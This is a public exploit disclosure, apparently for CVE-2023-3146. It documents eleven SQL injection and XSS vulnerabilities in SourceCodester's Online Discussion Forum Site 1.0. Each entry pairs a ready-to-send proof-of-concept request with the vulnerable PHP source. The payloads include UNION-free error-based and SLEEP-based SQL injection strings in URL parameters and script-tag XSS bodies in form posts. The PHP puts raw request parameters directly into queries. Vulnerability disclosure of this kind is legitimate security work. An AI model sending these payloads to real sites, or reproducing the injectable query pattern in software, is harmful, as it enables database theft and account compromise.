Headline
CVE-2023-3146: Vulnerability/Online Discussion Forum Site - multiple vulnerabilities.md at main · Peanut886/Vulnerability
A vulnerability, which was classified as critical, was found in SourceCodester Online Discussion Forum Site 1.0. This affects an unknown part of the file admin\categories\manage_category.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231015.
**Exploit Title: Online Discussion Forum Site - multiple vulnerabilities****Date: 2023-06/07****Exploit Author: Peanut886****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/download-code?nid=15337&title=Online+Discussion+Forum+Site+in+PHP%2FOOP+Free+Source+Code****Version: 1.0****Tested on: windows10 + phpstudy******1.SQL injection vulnerability in posts\view_post.php****
Sample request POC #1
http://odfs.com/?p=posts/view_post&id=1%27%20OR%20(SELECT%205314%20FROM(SELECT%20COUNT(*),CONCAT(0x71627a6a71,(SELECT%20(ELT(5314=5314,1))),0x7176787a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27wAaE%27=%27wAaE
Sqlmap running results #1
Related Codes posts\view_post.php
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$$k = $v;
}
}
}else{
echo '<script> alert("Post ID is not recognized."; location.replace("./p=posts");</script>';
}
}else{
echo '<script> alert("Post ID is required"; location.replace("./p=posts");</script>';
}
?>
****2.SQL injection vulnerability in user\manage_user.php****
Sample request POC #2
http://odfs.com/?p=user/manage_user&id=1%27%20OR%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(0x71627a6a71,(SELECT%20(ELT(6959=6959,1))),0x716b766b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27xbbY%27=%27xbbY
Sqlmap running results #2
Related Codes user\manage_user.php
<?php
if(isset($_GET['id'])){
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
foreach($user->fetch_array() as $k =>$v){
$meta[$k] = $v;
}
}
?>
****3.SQL injection vulnerability in posts\manage_post.php****
Sample request POC #3
http://odfs.com/?p=posts/manage_post&id=1%27%20AND%20(SELECT%201667%20FROM%20(SELECT(SLEEP(5)))KDHo)%20AND%20%27yeqR%27=%27yeqR
Sqlmap running results #3
Related Codes posts\manage_post.php
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM `post_list` where id= '{$_GET['id']}' and user_id = '{$_settings->userdata('id')}'");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$$k = $v;
}
}
}
}
?>
****4.SQL injection vulnerability in admin\user\manage_user.php****
Sample request POC #4
http://odfs.com/?p=admin/user/manage_user&id=1%27%20OR%20(SELECT%204186%20FROM(SELECT%20COUNT(*),CONCAT(0x71766b6a71,(SELECT%20(ELT(4186=4186,1))),0x71786b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27RAfl%27=%27RAfl
Sqlmap running results #4
Related Codes admin\user\manage_user.php
<?php
if(isset($_GET['id'])){
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
foreach($user->fetch_array() as $k =>$v){
$meta[$k] = $v;
}
}
?>
****5.SQL injection vulnerability in admin\posts\view_post.php****
Sample request POC #5
http://odfs.com/?p=admin/posts/view_post&id=1%27%20OR%20(SELECT%203303%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627671,(SELECT%20(ELT(3303=3303,1))),0x716a6a7871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27DgHr%27=%27DgHr
Sqlmap running results #5
Related Codes admin\posts\view_post.php
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$$k = $v;
}
}
}else{
echo '<script> alert("Post ID is not recognized."; location.replace("./p=posts");</script>';
}
}else{
echo '<script> alert("Post ID is required"; location.replace("./p=posts");</script>';
}
?>
****6.SQL injection vulnerability in admin\posts\manage_post.php****
Sample request POC #6
http://odfs.com/?p=admin/posts/manage_post&id=1%27%20OR%20(SELECT%206705%20FROM(SELECT%20COUNT(*),CONCAT(0x7162716a71,(SELECT%20(ELT(6705=6705,1))),0x7162706a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27xWgO%27=%27xWgO
Sqlmap running results #6
Related Codes admin\posts\manage_post.php
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM `post_list` where id= '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$$k = $v;
}
}
}
}
?>
****7.SQL injection vulnerability in admin\categories\view_category.php****
Sample request POC #7
GET /admin/categories/view_category.php?id=4 HTTP/1.1
Host: odfs.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://odfs.com/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
Sqlmap running results #7
Related Codes admin\categories\view_category.php
<?php
require_once('../../config.php');
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){
$$k=$v;
}
}
}
?>
****8.SQL injection vulnerability in admin\categories\manage_category.php****
Sample request POC #8
GET /admin/categories/manage_category.php?id=4 HTTP/1.1
Host: odfs.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://odfs.com/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
Sqlmap running results #8
Related Codes admin\categories\manage_category.php
<?php
require_once('../../config.php');
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){
$$k=$v;
}
}
}
?>
****9.SQL injection vulnerability in classes\Users.php(POST)****
Sample request POC #9
POST /classes/Users.php?f=registration HTTP/1.1
Host: odfs.com
Content-Length: 857
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWVcezwGAZd9UURw7
Origin: http://odfs.com
Referer: http://odfs.com/register.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="type"
2
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="firstname"
1
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="middlename"
22
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="lastname"
33
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="username"
123
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="password"
321
------WebKitFormBoundaryWVcezwGAZd9UURw7
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryWVcezwGAZd9UURw7--
Sqlmap running results #9
Related Codes classes\Users.php(POST)
function registration(){
if(!empty($_POST['password']))
$_POST['password'] = md5($_POST['password']);
else
unset($_POST['password']);
extract($_POST);
$data = "";
$check = $this->conn->query("SELECT * FROM `users` where username = '{$username}' ".($id > 0 ? " and id!='{$id}'" : "")." ")->num_rows;
if($check > 0){
$resp['status'] = 'failed';
$resp['msg'] = 'Username already exists.';
return json_encode($resp);
}
****10.Xss vulnerability in admin\posts\manage_post.php(title)****
Sample request POC #10
POST /classes/Master.php?f=save_post HTTP/1.1
Host: odfs.com
Content-Length: 602
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywn2OqIAtW9RRog2w
Origin: http://odfs.com
Referer: http://odfs.com/?p=posts/manage_post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="id"
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="title"
11<script>alert(111)</script>
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="category_id"
4
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="content"
<p>asd</p>
------WebKitFormBoundarywn2OqIAtW9RRog2w
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarywn2OqIAtW9RRog2w--
Sample response results #10
Related Codes admin\posts\manage_post.php(title)
<div class="form-group">
<label for="title" class="control-label">Title</label>
<input type="text" class="form-control rounded-0" name="title" id="title" value="<?= isset($title) ? $title : "" ?>">
</div>
****11.Xss vulnerability in admin\posts\manage_post.php(content)****
Sample request POC #11
POST /classes/Master.php?f=save_post HTTP/1.1
Host: odfs.com
Content-Length: 605
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTTVOK61sOtujLolB
Origin: http://odfs.com
Referer: http://odfs.com/?p=posts/manage_post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hbfgm77d947f3hrk84gd6u9r8s
Connection: close
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="title"
111
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="category_id"
4
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="content"
<script>alert(123)</script>
------WebKitFormBoundaryTTVOK61sOtujLolB
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryTTVOK61sOtujLolB--
Sample response results #11
Related Codes admin\posts\manage_post.php(content)
<div class="form-group">
<label for="content" class="control-label">Content</label>
<textarea type="text" class="form-control rounded-0" name="content" id="content"><?= isset($content) ? $content : "" ?></textarea>
</div>